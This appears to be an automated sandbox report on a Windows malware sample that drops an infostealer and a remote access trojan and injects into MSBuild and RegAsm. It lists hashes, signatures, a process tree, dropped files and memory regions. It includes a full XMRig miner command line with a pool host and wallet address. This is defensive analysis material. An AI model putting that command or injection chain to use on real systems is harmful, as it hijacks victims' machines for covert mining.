Analysis

  • max time kernel
    160s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2023 19:03

General

  • Target

    588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d.exe

  • Size

    1.5MB

  • MD5

    6367fb0d52b90b807550b3eedbb277f0

  • SHA1

    426f118550fa5006fbcab8c6d78b105600bf82c3

  • SHA256

    588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d

  • SHA512

    185171a50f2ce8d0742dc2e1fee5b2b91fd6884f899726495823124eed8b83094a9d570b04f7a9fbcaac56eca7e48a1c1679a3f284ea0ac3707340df1584b671

  • SSDEEP

    24576:Aj3JaPnj1wF03rp/EKWVgdG2rhQpG458wNNqZ:Aj3JE1wclEKMgdGpGydNy

Malware Config

Signatures

  • Detect PureLogs payload 4 IoCs
  • Detect ZGRat V1 34 IoCs
  • PureLogs

    PureLogs is an infostealer written in C#.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d.exe
    "C:\Users\Admin\AppData\Local\Temp\588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Users\Admin\AppData\Local\Temp\588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d.exe
      C:\Users\Admin\AppData\Local\Temp\588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d.exe
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:116
  • C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe
    C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3632
    • C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe
      C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3460
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:548
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4368
  • C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe
    C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:964
    • C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe
      C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1952
  • C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
    C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
      C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:624
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:772
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2148
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 41ro9pm28wkFbbFCnmC78AfqpdFTw3fE56kajDNhw3naU9nXJQiqSvi7Vv71yAxLG3hXtP5Jne8utHn1oHsPXo1MQBhA5D6.miners -p x --algo rx/0 --cpu-max-threads-hint=50
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:1220

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe

    Filesize

    1.5MB

    MD5

    6367fb0d52b90b807550b3eedbb277f0

    SHA1

    426f118550fa5006fbcab8c6d78b105600bf82c3

    SHA256

    588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d

    SHA512

    185171a50f2ce8d0742dc2e1fee5b2b91fd6884f899726495823124eed8b83094a9d570b04f7a9fbcaac56eca7e48a1c1679a3f284ea0ac3707340df1584b671

  • C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe

    Filesize

    1.5MB

    MD5

    6367fb0d52b90b807550b3eedbb277f0

    SHA1

    426f118550fa5006fbcab8c6d78b105600bf82c3

    SHA256

    588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d

    SHA512

    185171a50f2ce8d0742dc2e1fee5b2b91fd6884f899726495823124eed8b83094a9d570b04f7a9fbcaac56eca7e48a1c1679a3f284ea0ac3707340df1584b671

  • C:\Users\Admin\AppData\Local\IsFamilyOrAssembly\plmfstb\MajorRevision.exe

    Filesize

    1.5MB

    MD5

    6367fb0d52b90b807550b3eedbb277f0

    SHA1

    426f118550fa5006fbcab8c6d78b105600bf82c3

    SHA256

    588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d

    SHA512

    185171a50f2ce8d0742dc2e1fee5b2b91fd6884f899726495823124eed8b83094a9d570b04f7a9fbcaac56eca7e48a1c1679a3f284ea0ac3707340df1584b671

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\588506d91ec77a608a62417ea1d67204b1b173bd90af7e17cf52bbd0f03f7d2d.exe.log

    Filesize

    1KB

    MD5

    84a01db52ea5a878520e162c80acfcd3

    SHA1

    49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

    SHA256

    25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

    SHA512

    0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MSBuild.exe.log

    Filesize

    1KB

    MD5

    84a01db52ea5a878520e162c80acfcd3

    SHA1

    49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

    SHA256

    25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

    SHA512

    0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MajorRevision.exe.log

    Filesize

    1KB

    MD5

    84a01db52ea5a878520e162c80acfcd3

    SHA1

    49b7c5c072f6c32e54cc97c1dcbee90de0dd4738

    SHA256

    25ff806b9c85928aee814fa3aebbf45fa9735a7f594a6261f0779e89eb8c3bfe

    SHA512

    0516cbe6b9b7842be7f00ba3159a4df31257fc4e9db8ccb8f9f720801174f3d49327b7881c59ea12a4767c6d3e7c99a3b707c10279dfb39f12f9792134e6248e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RegAsm.exe.log

    Filesize

    1KB

    MD5

    9f5d0107d96d176b1ffcd5c7e7a42dc9

    SHA1

    de83788e2f18629555c42a3e6fada12f70457141

    SHA256

    d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

    SHA512

    86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log

    Filesize

    1KB

    MD5

    9f5d0107d96d176b1ffcd5c7e7a42dc9

    SHA1

    de83788e2f18629555c42a3e6fada12f70457141

    SHA256

    d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

    SHA512

    86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ymnwufjte.exe.log

    Filesize

    1KB

    MD5

    9f5d0107d96d176b1ffcd5c7e7a42dc9

    SHA1

    de83788e2f18629555c42a3e6fada12f70457141

    SHA256

    d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097

    SHA512

    86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

  • C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe

    Filesize

    1.8MB

    MD5

    421a51cf7323a3091d6e3e7ec437e45a

    SHA1

    308711b05e5d6a1d544983a50c40d666a7298f43

    SHA256

    1db0c1b8e51a57d7a52efe99927e10cd9413335284922f97bc7cbbaab9628132

    SHA512

    360538e796aefe3c78d9c437dbacf80c441690de3444ec845179499eff26b614937a066f817e0fd51a7fc58bc3d8a9145b345c830982edbb87b46444df4bf525

  • C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe

    Filesize

    1.8MB

    MD5

    421a51cf7323a3091d6e3e7ec437e45a

    SHA1

    308711b05e5d6a1d544983a50c40d666a7298f43

    SHA256

    1db0c1b8e51a57d7a52efe99927e10cd9413335284922f97bc7cbbaab9628132

    SHA512

    360538e796aefe3c78d9c437dbacf80c441690de3444ec845179499eff26b614937a066f817e0fd51a7fc58bc3d8a9145b345c830982edbb87b46444df4bf525

  • C:\Users\Admin\AppData\Local\Temp\ymnwufjte.exe

    Filesize

    1.8MB

    MD5

    421a51cf7323a3091d6e3e7ec437e45a

    SHA1

    308711b05e5d6a1d544983a50c40d666a7298f43

    SHA256

    1db0c1b8e51a57d7a52efe99927e10cd9413335284922f97bc7cbbaab9628132

    SHA512

    360538e796aefe3c78d9c437dbacf80c441690de3444ec845179499eff26b614937a066f817e0fd51a7fc58bc3d8a9145b345c830982edbb87b46444df4bf525

  • C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

    Filesize

    1.8MB

    MD5

    421a51cf7323a3091d6e3e7ec437e45a

    SHA1

    308711b05e5d6a1d544983a50c40d666a7298f43

    SHA256

    1db0c1b8e51a57d7a52efe99927e10cd9413335284922f97bc7cbbaab9628132

    SHA512

    360538e796aefe3c78d9c437dbacf80c441690de3444ec845179499eff26b614937a066f817e0fd51a7fc58bc3d8a9145b345c830982edbb87b46444df4bf525

  • C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

    Filesize

    1.8MB

    MD5

    421a51cf7323a3091d6e3e7ec437e45a

    SHA1

    308711b05e5d6a1d544983a50c40d666a7298f43

    SHA256

    1db0c1b8e51a57d7a52efe99927e10cd9413335284922f97bc7cbbaab9628132

    SHA512

    360538e796aefe3c78d9c437dbacf80c441690de3444ec845179499eff26b614937a066f817e0fd51a7fc58bc3d8a9145b345c830982edbb87b46444df4bf525

  • C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

    Filesize

    1.8MB

    MD5

    421a51cf7323a3091d6e3e7ec437e45a

    SHA1

    308711b05e5d6a1d544983a50c40d666a7298f43

    SHA256

    1db0c1b8e51a57d7a52efe99927e10cd9413335284922f97bc7cbbaab9628132

    SHA512

    360538e796aefe3c78d9c437dbacf80c441690de3444ec845179499eff26b614937a066f817e0fd51a7fc58bc3d8a9145b345c830982edbb87b46444df4bf525

  • memory/116-67-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-2216-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/116-21-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-23-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-25-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-27-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-29-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-31-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-33-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-35-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-37-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-39-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-41-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-43-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-45-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-47-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-49-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-51-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-53-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-55-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-57-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-59-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-61-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-63-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-65-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-7-0x0000000000400000-0x00000000004AA000-memory.dmp

    Filesize

    680KB

  • memory/116-69-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-71-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-73-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-75-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-2212-0x0000027D181B0000-0x0000027D181B8000-memory.dmp

    Filesize

    32KB

  • memory/116-2213-0x0000027D181C0000-0x0000027D18216000-memory.dmp

    Filesize

    344KB

  • memory/116-2214-0x0000027D185B0000-0x0000027D18604000-memory.dmp

    Filesize

    336KB

  • memory/116-19-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-17-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-15-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-10-0x0000027D7B670000-0x0000027D7B754000-memory.dmp

    Filesize

    912KB

  • memory/116-13-0x0000027D7D960000-0x0000027D7D970000-memory.dmp

    Filesize

    64KB

  • memory/116-14-0x0000027D7B670000-0x0000027D7B750000-memory.dmp

    Filesize

    896KB

  • memory/116-12-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/548-4428-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/548-4436-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/548-4429-0x00000250D3960000-0x00000250D3970000-memory.dmp

    Filesize

    64KB

  • memory/624-0-0x0000013D354C0000-0x0000013D3563A000-memory.dmp

    Filesize

    1.5MB

  • memory/624-4-0x0000013D4FD10000-0x0000013D4FDD8000-memory.dmp

    Filesize

    800KB

  • memory/624-1-0x0000013D37400000-0x0000013D374E0000-memory.dmp

    Filesize

    896KB

  • memory/624-6675-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/624-2-0x0000013D4FC40000-0x0000013D4FD08000-memory.dmp

    Filesize

    800KB

  • memory/624-6673-0x000001E297FD0000-0x000001E297FE0000-memory.dmp

    Filesize

    64KB

  • memory/624-6672-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/624-11-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/624-3-0x00007FFB2F3C0000-0x00007FFB2FE81000-memory.dmp

    Filesize

    10.8MB

  • memory/624-5-0x0000013D37350000-0x0000013D37360000-memory.dmp

    Filesize

    64KB

  • memory/624-6-0x0000013D373A0000-0x0000013D373EC000-memory.dmp

    Filesize

    304KB

  • memory/772-6676-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/772-6683-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/772-6677-0x000002611AA10000-0x000002611AA20000-memory.dmp

    Filesize

    64KB

  • memory/964-6641-0x000002C45F890000-0x000002C45FA6A000-memory.dmp

    Filesize

    1.9MB

  • memory/964-6642-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/964-6644-0x000002C479F40000-0x000002C47A028000-memory.dmp

    Filesize

    928KB

  • memory/964-6645-0x000002C47A030000-0x000002C47A118000-memory.dmp

    Filesize

    928KB

  • memory/964-6646-0x000002C47A120000-0x000002C47A1F0000-memory.dmp

    Filesize

    832KB

  • memory/964-6647-0x000002C47A2F0000-0x000002C47A3C0000-memory.dmp

    Filesize

    832KB

  • memory/964-6651-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/1220-6696-0x000001BF73800000-0x000001BF73840000-memory.dmp

    Filesize

    256KB

  • memory/1220-6690-0x0000000140000000-0x00000001407CF000-memory.dmp

    Filesize

    7.8MB

  • memory/1952-6657-0x00000279E3FC0000-0x00000279E3FC8000-memory.dmp

    Filesize

    32KB

  • memory/1952-6653-0x0000000000400000-0x00000000004B2000-memory.dmp

    Filesize

    712KB

  • memory/1952-6656-0x00000279FCA40000-0x00000279FCA50000-memory.dmp

    Filesize

    64KB

  • memory/1952-6654-0x00000279FC880000-0x00000279FC980000-memory.dmp

    Filesize

    1024KB

  • memory/1952-6658-0x00000279FC980000-0x00000279FC9D6000-memory.dmp

    Filesize

    344KB

  • memory/1952-6661-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/1952-6655-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/2148-6698-0x0000022AC25E0000-0x0000022AC25F0000-memory.dmp

    Filesize

    64KB

  • memory/2148-6681-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/2148-6685-0x0000022AC25E0000-0x0000022AC25F0000-memory.dmp

    Filesize

    64KB

  • memory/2148-6684-0x0000022AC25E0000-0x0000022AC25F0000-memory.dmp

    Filesize

    64KB

  • memory/2148-6699-0x0000022AC25E0000-0x0000022AC25F0000-memory.dmp

    Filesize

    64KB

  • memory/2148-6700-0x0000022AC25E0000-0x0000022AC25F0000-memory.dmp

    Filesize

    64KB

  • memory/2148-6682-0x0000022AC25E0000-0x0000022AC25F0000-memory.dmp

    Filesize

    64KB

  • memory/2148-6697-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/2172-6670-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/2172-6666-0x000001DA24070000-0x000001DA24080000-memory.dmp

    Filesize

    64KB

  • memory/2172-6665-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3460-4430-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3460-4427-0x0000026551C30000-0x0000026551C40000-memory.dmp

    Filesize

    64KB

  • memory/3460-2226-0x0000026551C30000-0x0000026551C40000-memory.dmp

    Filesize

    64KB

  • memory/3460-2225-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3632-2227-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3632-2219-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3632-2220-0x000001F134F70000-0x000001F134F80000-memory.dmp

    Filesize

    64KB

  • memory/4368-6643-0x00000199A8C70000-0x00000199A8C80000-memory.dmp

    Filesize

    64KB

  • memory/4368-4434-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4368-4435-0x00000199A8C70000-0x00000199A8C80000-memory.dmp

    Filesize

    64KB

  • memory/4368-6637-0x00000199A8C70000-0x00000199A8C80000-memory.dmp

    Filesize

    64KB

  • memory/4368-6638-0x00007FFB2E6E0000-0x00007FFB2F1A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4368-6662-0x00000199A8C70000-0x00000199A8C80000-memory.dmp

    Filesize

    64KB